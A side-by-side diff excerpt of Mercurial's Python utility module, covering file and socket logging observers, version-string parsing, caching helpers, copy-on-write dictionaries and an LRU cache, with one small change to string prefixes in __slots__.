716 class baseproxyobserver(object):
717 def _writedata(self, data):
717 def _writedata(self, data):
718 if not self.logdata:
718 if not self.logdata:
719 if self.logdataapis:
719 if self.logdataapis:
720 self.fh.write('\n')
720 self.fh.write('\n')
721 self.fh.flush()
721 self.fh.flush()
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 if self.logdataapis:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
728 else:
729 self.fh.write('%s> %s\n'
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
731 self.fh.flush()
732 return
732 return
733
733
734 # Data with newlines is written to multiple lines.
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
735 if self.logdataapis:
736 self.fh.write(':\n')
736 self.fh.write(':\n')
737
737
738 lines = data.splitlines(True)
738 lines = data.splitlines(True)
739 for line in lines:
739 for line in lines:
740 self.fh.write('%s> %s\n'
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
742 self.fh.flush()
743
743
744 class fileobjectobserver(baseproxyobserver):
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
747 logdataapis=True):
748 self.fh = fh
748 self.fh = fh
749 self.name = name
749 self.name = name
750 self.logdata = logdata
750 self.logdata = logdata
751 self.logdataapis = logdataapis
751 self.logdataapis = logdataapis
752 self.reads = reads
752 self.reads = reads
753 self.writes = writes
753 self.writes = writes
754
754
755 def read(self, res, size=-1):
755 def read(self, res, size=-1):
756 if not self.reads:
756 if not self.reads:
757 return
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
759 if res is None:
760 res = ''
760 res = ''
761
761
762 if size == -1 and res == '':
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
766 # Python 2 and 3 behavior. :(
767 return
767 return
768
768
769 if self.logdataapis:
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
771
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def readline(self, res, limit=-1):
774 def readline(self, res, limit=-1):
775 if not self.reads:
775 if not self.reads:
776 return
776 return
777
777
778 if self.logdataapis:
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
780
781 self._writedata(res)
781 self._writedata(res)
782
782
783 def readinto(self, res, dest):
783 def readinto(self, res, dest):
784 if not self.reads:
784 if not self.reads:
785 return
785 return
786
786
787 if self.logdataapis:
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
789 res))
790
790
791 data = dest[0:res] if res is not None else b''
791 data = dest[0:res] if res is not None else b''
792
792
793 # _writedata() uses "in" operator and is confused by memoryview because
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
795 if isinstance(data, memoryview):
796 data = data.tobytes()
796 data = data.tobytes()
797
797
798 self._writedata(data)
798 self._writedata(data)
799
799
800 def write(self, res, data):
800 def write(self, res, data):
801 if not self.writes:
801 if not self.writes:
802 return
802 return
803
803
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 # returns the integer bytes written.
805 # returns the integer bytes written.
806 if res is None and data:
806 if res is None and data:
807 res = len(data)
807 res = len(data)
808
808
809 if self.logdataapis:
809 if self.logdataapis:
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811
811
812 self._writedata(data)
812 self._writedata(data)
813
813
814 def flush(self, res):
814 def flush(self, res):
815 if not self.writes:
815 if not self.writes:
816 return
816 return
817
817
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819
819
820 # For observedbufferedinputpipe.
820 # For observedbufferedinputpipe.
821 def bufferedread(self, res, size):
821 def bufferedread(self, res, size):
822 if not self.reads:
822 if not self.reads:
823 return
823 return
824
824
825 if self.logdataapis:
825 if self.logdataapis:
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 self.name, size, len(res)))
827 self.name, size, len(res)))
828
828
829 self._writedata(res)
829 self._writedata(res)
830
830
831 def bufferedreadline(self, res):
831 def bufferedreadline(self, res):
832 if not self.reads:
832 if not self.reads:
833 return
833 return
834
834
835 if self.logdataapis:
835 if self.logdataapis:
836 self.fh.write('%s> bufferedreadline() -> %d' % (
836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 self.name, len(res)))
837 self.name, len(res)))
838
838
839 self._writedata(res)
839 self._writedata(res)
840
840
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 logdata=False, logdataapis=True):
842 logdata=False, logdataapis=True):
843 """Turn a file object into a logging file object."""
843 """Turn a file object into a logging file object."""
844
844
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 logdata=logdata, logdataapis=logdataapis)
846 logdata=logdata, logdataapis=logdataapis)
847 return fileobjectproxy(fh, observer)
847 return fileobjectproxy(fh, observer)
848
848
849 class socketobserver(baseproxyobserver):
849 class socketobserver(baseproxyobserver):
850 """Logs socket activity."""
850 """Logs socket activity."""
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 logdata=False, logdataapis=True):
852 logdata=False, logdataapis=True):
853 self.fh = fh
853 self.fh = fh
854 self.name = name
854 self.name = name
855 self.reads = reads
855 self.reads = reads
856 self.writes = writes
856 self.writes = writes
857 self.states = states
857 self.states = states
858 self.logdata = logdata
858 self.logdata = logdata
859 self.logdataapis = logdataapis
859 self.logdataapis = logdataapis
860
860
861 def makefile(self, res, mode=None, bufsize=None):
861 def makefile(self, res, mode=None, bufsize=None):
862 if not self.states:
862 if not self.states:
863 return
863 return
864
864
865 self.fh.write('%s> makefile(%r, %r)\n' % (
865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 self.name, mode, bufsize))
866 self.name, mode, bufsize))
867
867
868 def recv(self, res, size, flags=0):
868 def recv(self, res, size, flags=0):
869 if not self.reads:
869 if not self.reads:
870 return
870 return
871
871
872 if self.logdataapis:
872 if self.logdataapis:
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 self.name, size, flags, len(res)))
874 self.name, size, flags, len(res)))
875 self._writedata(res)
875 self._writedata(res)
876
876
877 def recvfrom(self, res, size, flags=0):
877 def recvfrom(self, res, size, flags=0):
878 if not self.reads:
878 if not self.reads:
879 return
879 return
880
880
881 if self.logdataapis:
881 if self.logdataapis:
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 self.name, size, flags, len(res[0])))
883 self.name, size, flags, len(res[0])))
884
884
885 self._writedata(res[0])
885 self._writedata(res[0])
886
886
887 def recvfrom_into(self, res, buf, size, flags=0):
887 def recvfrom_into(self, res, buf, size, flags=0):
888 if not self.reads:
888 if not self.reads:
889 return
889 return
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 self.name, size, flags, res[0]))
893 self.name, size, flags, res[0]))
894
894
895 self._writedata(buf[0:res[0]])
895 self._writedata(buf[0:res[0]])
896
896
897 def recv_into(self, res, buf, size=0, flags=0):
897 def recv_into(self, res, buf, size=0, flags=0):
898 if not self.reads:
898 if not self.reads:
899 return
899 return
900
900
901 if self.logdataapis:
901 if self.logdataapis:
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 self.name, size, flags, res))
903 self.name, size, flags, res))
904
904
905 self._writedata(buf[0:res])
905 self._writedata(buf[0:res])
906
906
907 def send(self, res, data, flags=0):
907 def send(self, res, data, flags=0):
908 if not self.writes:
908 if not self.writes:
909 return
909 return
910
910
911 self.fh.write('%s> send(%d, %d) -> %d' % (
911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 self.name, len(data), flags, len(res)))
912 self.name, len(data), flags, len(res)))
913 self._writedata(data)
913 self._writedata(data)
914
914
915 def sendall(self, res, data, flags=0):
915 def sendall(self, res, data, flags=0):
916 if not self.writes:
916 if not self.writes:
917 return
917 return
918
918
919 if self.logdataapis:
919 if self.logdataapis:
920 # Returns None on success. So don't bother reporting return value.
920 # Returns None on success. So don't bother reporting return value.
921 self.fh.write('%s> sendall(%d, %d)' % (
921 self.fh.write('%s> sendall(%d, %d)' % (
922 self.name, len(data), flags))
922 self.name, len(data), flags))
923
923
924 self._writedata(data)
924 self._writedata(data)
925
925
926 def sendto(self, res, data, flagsoraddress, address=None):
926 def sendto(self, res, data, flagsoraddress, address=None):
927 if not self.writes:
927 if not self.writes:
928 return
928 return
929
929
930 if address:
930 if address:
931 flags = flagsoraddress
931 flags = flagsoraddress
932 else:
932 else:
933 flags = 0
933 flags = 0
934
934
935 if self.logdataapis:
935 if self.logdataapis:
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 self.name, len(data), flags, address, res))
937 self.name, len(data), flags, address, res))
938
938
939 self._writedata(data)
939 self._writedata(data)
940
940
941 def setblocking(self, res, flag):
941 def setblocking(self, res, flag):
942 if not self.states:
942 if not self.states:
943 return
943 return
944
944
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946
946
947 def settimeout(self, res, value):
947 def settimeout(self, res, value):
948 if not self.states:
948 if not self.states:
949 return
949 return
950
950
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952
952
953 def gettimeout(self, res):
953 def gettimeout(self, res):
954 if not self.states:
954 if not self.states:
955 return
955 return
956
956
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958
958
959 def setsockopt(self, res, level, optname, value):
959 def setsockopt(self, res, level, optname, value):
960 if not self.states:
960 if not self.states:
961 return
961 return
962
962
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 self.name, level, optname, value, res))
964 self.name, level, optname, value, res))
965
965
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 logdata=False, logdataapis=True):
967 logdata=False, logdataapis=True):
968 """Turn a socket into a logging socket."""
968 """Turn a socket into a logging socket."""
969
969
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 states=states, logdata=logdata,
971 states=states, logdata=logdata,
972 logdataapis=logdataapis)
972 logdataapis=logdataapis)
973 return socketproxy(fh, observer)
973 return socketproxy(fh, observer)
974
974
975 def version():
975 def version():
976 """Return version information if available."""
976 """Return version information if available."""
977 try:
977 try:
978 from . import __version__
978 from . import __version__
979 return __version__.version
979 return __version__.version
980 except ImportError:
980 except ImportError:
981 return 'unknown'
981 return 'unknown'
982
982
983 def versiontuple(v=None, n=4):
983 def versiontuple(v=None, n=4):
984 """Parses a Mercurial version string into an N-tuple.
984 """Parses a Mercurial version string into an N-tuple.
985
985
986 The version string to be parsed is specified with the ``v`` argument.
986 The version string to be parsed is specified with the ``v`` argument.
987 If it isn't defined, the current Mercurial version string will be parsed.
987 If it isn't defined, the current Mercurial version string will be parsed.
988
988
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 returned values:
990 returned values:
991
991
992 >>> v = b'3.6.1+190-df9b73d2d444'
992 >>> v = b'3.6.1+190-df9b73d2d444'
993 >>> versiontuple(v, 2)
993 >>> versiontuple(v, 2)
994 (3, 6)
994 (3, 6)
995 >>> versiontuple(v, 3)
995 >>> versiontuple(v, 3)
996 (3, 6, 1)
996 (3, 6, 1)
997 >>> versiontuple(v, 4)
997 >>> versiontuple(v, 4)
998 (3, 6, 1, '190-df9b73d2d444')
998 (3, 6, 1, '190-df9b73d2d444')
999
999
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002
1002
1003 >>> v = b'3.6'
1003 >>> v = b'3.6'
1004 >>> versiontuple(v, 2)
1004 >>> versiontuple(v, 2)
1005 (3, 6)
1005 (3, 6)
1006 >>> versiontuple(v, 3)
1006 >>> versiontuple(v, 3)
1007 (3, 6, None)
1007 (3, 6, None)
1008 >>> versiontuple(v, 4)
1008 >>> versiontuple(v, 4)
1009 (3, 6, None, None)
1009 (3, 6, None, None)
1010
1010
1011 >>> v = b'3.9-rc'
1011 >>> v = b'3.9-rc'
1012 >>> versiontuple(v, 2)
1012 >>> versiontuple(v, 2)
1013 (3, 9)
1013 (3, 9)
1014 >>> versiontuple(v, 3)
1014 >>> versiontuple(v, 3)
1015 (3, 9, None)
1015 (3, 9, None)
1016 >>> versiontuple(v, 4)
1016 >>> versiontuple(v, 4)
1017 (3, 9, None, 'rc')
1017 (3, 9, None, 'rc')
1018
1018
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 >>> versiontuple(v, 2)
1020 >>> versiontuple(v, 2)
1021 (3, 9)
1021 (3, 9)
1022 >>> versiontuple(v, 3)
1022 >>> versiontuple(v, 3)
1023 (3, 9, None)
1023 (3, 9, None)
1024 >>> versiontuple(v, 4)
1024 >>> versiontuple(v, 4)
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026
1026
1027 >>> versiontuple(b'4.6rc0')
1027 >>> versiontuple(b'4.6rc0')
1028 (4, 6, None, 'rc0')
1028 (4, 6, None, 'rc0')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 >>> versiontuple(b'.1.2.3')
1031 >>> versiontuple(b'.1.2.3')
1032 (None, None, None, '.1.2.3')
1032 (None, None, None, '.1.2.3')
1033 >>> versiontuple(b'12.34..5')
1033 >>> versiontuple(b'12.34..5')
1034 (12, 34, None, '..5')
1034 (12, 34, None, '..5')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1037 """
1037 """
1038 if not v:
1038 if not v:
1039 v = version()
1039 v = version()
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 if not m:
1041 if not m:
1042 vparts, extra = '', v
1042 vparts, extra = '', v
1043 elif m.group(2):
1043 elif m.group(2):
1044 vparts, extra = m.groups()
1044 vparts, extra = m.groups()
1045 else:
1045 else:
1046 vparts, extra = m.group(1), None
1046 vparts, extra = m.group(1), None
1047
1047
1048 vints = []
1048 vints = []
1049 for i in vparts.split('.'):
1049 for i in vparts.split('.'):
1050 try:
1050 try:
1051 vints.append(int(i))
1051 vints.append(int(i))
1052 except ValueError:
1052 except ValueError:
1053 break
1053 break
1054 # (3, 6) -> (3, 6, None)
1054 # (3, 6) -> (3, 6, None)
1055 while len(vints) < 3:
1055 while len(vints) < 3:
1056 vints.append(None)
1056 vints.append(None)
1057
1057
1058 if n == 2:
1058 if n == 2:
1059 return (vints[0], vints[1])
1059 return (vints[0], vints[1])
1060 if n == 3:
1060 if n == 3:
1061 return (vints[0], vints[1], vints[2])
1061 return (vints[0], vints[1], vints[2])
1062 if n == 4:
1062 if n == 4:
1063 return (vints[0], vints[1], vints[2], extra)
1063 return (vints[0], vints[1], vints[2], extra)
1064
1064
1065 def cachefunc(func):
1065 def cachefunc(func):
1066 '''cache the result of function calls'''
1066 '''cache the result of function calls'''
1067 # XXX doesn't handle keywords args
1067 # XXX doesn't handle keywords args
1068 if func.__code__.co_argcount == 0:
1068 if func.__code__.co_argcount == 0:
1069 cache = []
1069 cache = []
1070 def f():
1070 def f():
1071 if len(cache) == 0:
1071 if len(cache) == 0:
1072 cache.append(func())
1072 cache.append(func())
1073 return cache[0]
1073 return cache[0]
1074 return f
1074 return f
1075 cache = {}
1075 cache = {}
1076 if func.__code__.co_argcount == 1:
1076 if func.__code__.co_argcount == 1:
1077 # we gain a small amount of time because
1077 # we gain a small amount of time because
1078 # we don't need to pack/unpack the list
1078 # we don't need to pack/unpack the list
1079 def f(arg):
1079 def f(arg):
1080 if arg not in cache:
1080 if arg not in cache:
1081 cache[arg] = func(arg)
1081 cache[arg] = func(arg)
1082 return cache[arg]
1082 return cache[arg]
1083 else:
1083 else:
1084 def f(*args):
1084 def f(*args):
1085 if args not in cache:
1085 if args not in cache:
1086 cache[args] = func(*args)
1086 cache[args] = func(*args)
1087 return cache[args]
1087 return cache[args]
1088
1088
1089 return f
1089 return f
1090
1090
1091 class cow(object):
1091 class cow(object):
1092 """helper class to make copy-on-write easier
1092 """helper class to make copy-on-write easier
1093
1093
1094 Call preparewrite before doing any writes.
1094 Call preparewrite before doing any writes.
1095 """
1095 """
1096
1096
1097 def preparewrite(self):
1097 def preparewrite(self):
1098 """call this before writes, return self or a copied new object"""
1098 """call this before writes, return self or a copied new object"""
1099 if getattr(self, '_copied', 0):
1099 if getattr(self, '_copied', 0):
1100 self._copied -= 1
1100 self._copied -= 1
1101 return self.__class__(self)
1101 return self.__class__(self)
1102 return self
1102 return self
1103
1103
1104 def copy(self):
1104 def copy(self):
1105 """always do a cheap copy"""
1105 """always do a cheap copy"""
1106 self._copied = getattr(self, '_copied', 0) + 1
1106 self._copied = getattr(self, '_copied', 0) + 1
1107 return self
1107 return self
1108
1108
1109 class sortdict(collections.OrderedDict):
1109 class sortdict(collections.OrderedDict):
1110 '''a simple sorted dictionary
1110 '''a simple sorted dictionary
1111
1111
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 >>> d2 = d1.copy()
1113 >>> d2 = d1.copy()
1114 >>> d2
1114 >>> d2
1115 sortdict([('a', 0), ('b', 1)])
1115 sortdict([('a', 0), ('b', 1)])
1116 >>> d2.update([(b'a', 2)])
1116 >>> d2.update([(b'a', 2)])
1117 >>> list(d2.keys()) # should still be in last-set order
1117 >>> list(d2.keys()) # should still be in last-set order
1118 ['b', 'a']
1118 ['b', 'a']
1119 '''
1119 '''
1120
1120
1121 def __setitem__(self, key, value):
1121 def __setitem__(self, key, value):
1122 if key in self:
1122 if key in self:
1123 del self[key]
1123 del self[key]
1124 super(sortdict, self).__setitem__(key, value)
1124 super(sortdict, self).__setitem__(key, value)
1125
1125
1126 if pycompat.ispypy:
1126 if pycompat.ispypy:
1127 # __setitem__() isn't called as of PyPy 5.8.0
1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 def update(self, src):
1128 def update(self, src):
1129 if isinstance(src, dict):
1129 if isinstance(src, dict):
1130 src = src.iteritems()
1130 src = src.iteritems()
1131 for k, v in src:
1131 for k, v in src:
1132 self[k] = v
1132 self[k] = v
1133
1133
1134 class cowdict(cow, dict):
1134 class cowdict(cow, dict):
1135 """copy-on-write dict
1135 """copy-on-write dict
1136
1136
1137 Be sure to call d = d.preparewrite() before writing to d.
1137 Be sure to call d = d.preparewrite() before writing to d.
1138
1138
1139 >>> a = cowdict()
1139 >>> a = cowdict()
1140 >>> a is a.preparewrite()
1140 >>> a is a.preparewrite()
1141 True
1141 True
1142 >>> b = a.copy()
1142 >>> b = a.copy()
1143 >>> b is a
1143 >>> b is a
1144 True
1144 True
1145 >>> c = b.copy()
1145 >>> c = b.copy()
1146 >>> c is a
1146 >>> c is a
1147 True
1147 True
1148 >>> a = a.preparewrite()
1148 >>> a = a.preparewrite()
1149 >>> b is a
1149 >>> b is a
1150 False
1150 False
1151 >>> a is a.preparewrite()
1151 >>> a is a.preparewrite()
1152 True
1152 True
1153 >>> c = c.preparewrite()
1153 >>> c = c.preparewrite()
1154 >>> b is c
1154 >>> b is c
1155 False
1155 False
1156 >>> b is b.preparewrite()
1156 >>> b is b.preparewrite()
1157 True
1157 True
1158 """
1158 """
1159
1159
1160 class cowsortdict(cow, sortdict):
1160 class cowsortdict(cow, sortdict):
1161 """copy-on-write sortdict
1161 """copy-on-write sortdict
1162
1162
1163 Be sure to call d = d.preparewrite() before writing to d.
1163 Be sure to call d = d.preparewrite() before writing to d.
1164 """
1164 """
1165
1165
1166 class transactional(object):
1166 class transactional(object):
1167 """Base class for making a transactional type into a context manager."""
1167 """Base class for making a transactional type into a context manager."""
1168 __metaclass__ = abc.ABCMeta
1168 __metaclass__ = abc.ABCMeta
1169
1169
1170 @abc.abstractmethod
1170 @abc.abstractmethod
1171 def close(self):
1171 def close(self):
1172 """Successfully closes the transaction."""
1172 """Successfully closes the transaction."""
1173
1173
1174 @abc.abstractmethod
1174 @abc.abstractmethod
1175 def release(self):
1175 def release(self):
1176 """Marks the end of the transaction.
1176 """Marks the end of the transaction.
1177
1177
1178 If the transaction has not been closed, it will be aborted.
1178 If the transaction has not been closed, it will be aborted.
1179 """
1179 """
1180
1180
1181 def __enter__(self):
1181 def __enter__(self):
1182 return self
1182 return self
1183
1183
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1185 try:
1185 try:
1186 if exc_type is None:
1186 if exc_type is None:
1187 self.close()
1187 self.close()
1188 finally:
1188 finally:
1189 self.release()
1189 self.release()
1190
1190
1191 @contextlib.contextmanager
1191 @contextlib.contextmanager
1192 def acceptintervention(tr=None):
1192 def acceptintervention(tr=None):
1193 """A context manager that closes the transaction on InterventionRequired
1193 """A context manager that closes the transaction on InterventionRequired
1194
1194
1195 If no transaction was provided, this simply runs the body and returns
1195 If no transaction was provided, this simply runs the body and returns
1196 """
1196 """
1197 if not tr:
1197 if not tr:
1198 yield
1198 yield
1199 return
1199 return
1200 try:
1200 try:
1201 yield
1201 yield
1202 tr.close()
1202 tr.close()
1203 except error.InterventionRequired:
1203 except error.InterventionRequired:
1204 tr.close()
1204 tr.close()
1205 raise
1205 raise
1206 finally:
1206 finally:
1207 tr.release()
1207 tr.release()
1208
1208
1209 @contextlib.contextmanager
1209 @contextlib.contextmanager
1210 def nullcontextmanager():
1210 def nullcontextmanager():
1211 yield
1211 yield
1212
1212
1213 class _lrucachenode(object):
1213 class _lrucachenode(object):
1214 """A node in a doubly linked list.
1214 """A node in a doubly linked list.
1215
1215
1216 Holds a reference to nodes on either side as well as a key-value
1216 Holds a reference to nodes on either side as well as a key-value
1217 pair for the dictionary entry.
1217 pair for the dictionary entry.
1218 """
1218 """
1219 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220
1220
1221 def __init__(self):
1221 def __init__(self):
1222 self.next = None
1222 self.next = None
1223 self.prev = None
1223 self.prev = None
1224
1224
1225 self.key = _notset
1225 self.key = _notset
1226 self.value = None
1226 self.value = None
1227 self.cost = 0
1227 self.cost = 0
1228
1228
1229 def markempty(self):
1229 def markempty(self):
1230 """Mark the node as emptied."""
1230 """Mark the node as emptied."""
1231 self.key = _notset
1231 self.key = _notset
1232 self.value = None
1232 self.value = None
1233 self.cost = 0
1233 self.cost = 0
1234
1234
1235 class lrucachedict(object):
1235 class lrucachedict(object):
1236 """Dict that caches most recent accesses and sets.
1236 """Dict that caches most recent accesses and sets.
1237
1237
1238 The dict consists of an actual backing dict - indexed by original
1238 The dict consists of an actual backing dict - indexed by original
1239 key - and a doubly linked circular list defining the order of entries in
1239 key - and a doubly linked circular list defining the order of entries in
1240 the cache.
1240 the cache.
1241
1241
1242 The head node is the newest entry in the cache. If the cache is full,
1242 The head node is the newest entry in the cache. If the cache is full,
1243 we recycle head.prev and make it the new head. Cache accesses result in
1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 the node being moved to before the existing head and being marked as the
1244 the node being moved to before the existing head and being marked as the
1245 new head node.
1245 new head node.
1246
1246
1247 Items in the cache can be inserted with an optional "cost" value. This is
1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 simply an integer that is specified by the caller. The cache can be queried
1248 simply an integer that is specified by the caller. The cache can be queried
1249 for the total cost of all items presently in the cache.
1249 for the total cost of all items presently in the cache.
1250
1250
1251 The cache can also define a maximum cost. If a cache insertion would
1251 The cache can also define a maximum cost. If a cache insertion would
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 nodes will be evicted to make room for the new code. This can be used
1253 nodes will be evicted to make room for the new code. This can be used
1254 to e.g. set a max memory limit and associate an estimated bytes size
1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1256 """
1256 """
1257 def __init__(self, max, maxcost=0):
1257 def __init__(self, max, maxcost=0):
1258 self._cache = {}
1258 self._cache = {}
1259
1259
1260 self._head = head = _lrucachenode()
1260 self._head = head = _lrucachenode()
1261 head.prev = head
1261 head.prev = head
1262 head.next = head
1262 head.next = head
1263 self._size = 1
1263 self._size = 1
1264 self.capacity = max
1264 self.capacity = max
1265 self.totalcost = 0
1265 self.totalcost = 0
1266 self.maxcost = maxcost
1266 self.maxcost = maxcost
1267
1267
1268 def __len__(self):
1268 def __len__(self):
1269 return len(self._cache)
1269 return len(self._cache)
1270
1270
1271 def __contains__(self, k):
1271 def __contains__(self, k):
1272 return k in self._cache
1272 return k in self._cache
1273
1273
1274 def __iter__(self):
1274 def __iter__(self):
1275 # We don't have to iterate in cache order, but why not.
1275 # We don't have to iterate in cache order, but why not.
1276 n = self._head
1276 n = self._head
1277 for i in range(len(self._cache)):
1277 for i in range(len(self._cache)):
1278 yield n.key
1278 yield n.key
1279 n = n.next
1279 n = n.next
1280
1280
1281 def __getitem__(self, k):
1281 def __getitem__(self, k):
1282 node = self._cache[k]
1282 node = self._cache[k]
1283 self._movetohead(node)
1283 self._movetohead(node)
1284 return node.value
1284 return node.value
1285
1285
1286 def insert(self, k, v, cost=0):
1286 def insert(self, k, v, cost=0):
1287 """Insert a new item in the cache with optional cost value."""
1287 """Insert a new item in the cache with optional cost value."""
1288 node = self._cache.get(k)
1288 node = self._cache.get(k)
1289 # Replace existing value and mark as newest.
1289 # Replace existing value and mark as newest.
1290 if node is not None:
1290 if node is not None:
1291 self.totalcost -= node.cost
1291 self.totalcost -= node.cost
1292 node.value = v
1292 node.value = v
1293 node.cost = cost
1293 node.cost = cost
1294 self.totalcost += cost
1294 self.totalcost += cost
1295 self._movetohead(node)
1295 self._movetohead(node)
1296
1296
1297 if self.maxcost:
1297 if self.maxcost:
1298 self._enforcecostlimit()
1298 self._enforcecostlimit()
1299
1299
1300 return
1300 return
1301
1301
1302 if self._size < self.capacity:
1302 if self._size < self.capacity:
1303 node = self._addcapacity()
1303 node = self._addcapacity()
1304 else:
1304 else:
1305 # Grab the last/oldest item.
1305 # Grab the last/oldest item.
1306 node = self._head.prev
1306 node = self._head.prev
1307
1307
1308 # At capacity. Kill the old entry.
1308 # At capacity. Kill the old entry.
1309 if node.key is not _notset:
1309 if node.key is not _notset:
1310 self.totalcost -= node.cost
1310 self.totalcost -= node.cost
1311 del self._cache[node.key]
1311 del self._cache[node.key]
1312
1312
1313 node.key = k
1313 node.key = k
1314 node.value = v
1314 node.value = v
1315 node.cost = cost
1315 node.cost = cost
1316 self.totalcost += cost
1316 self.totalcost += cost
1317 self._cache[k] = node
1317 self._cache[k] = node
1318 # And mark it as newest entry. No need to adjust order since it
1318 # And mark it as newest entry. No need to adjust order since it
1319 # is already self._head.prev.
1319 # is already self._head.prev.
1320 self._head = node
1320 self._head = node
1321
1321
1322 if self.maxcost:
1322 if self.maxcost:
1323 self._enforcecostlimit()
1323 self._enforcecostlimit()
1324
1324
1325 def __setitem__(self, k, v):
1325 def __setitem__(self, k, v):
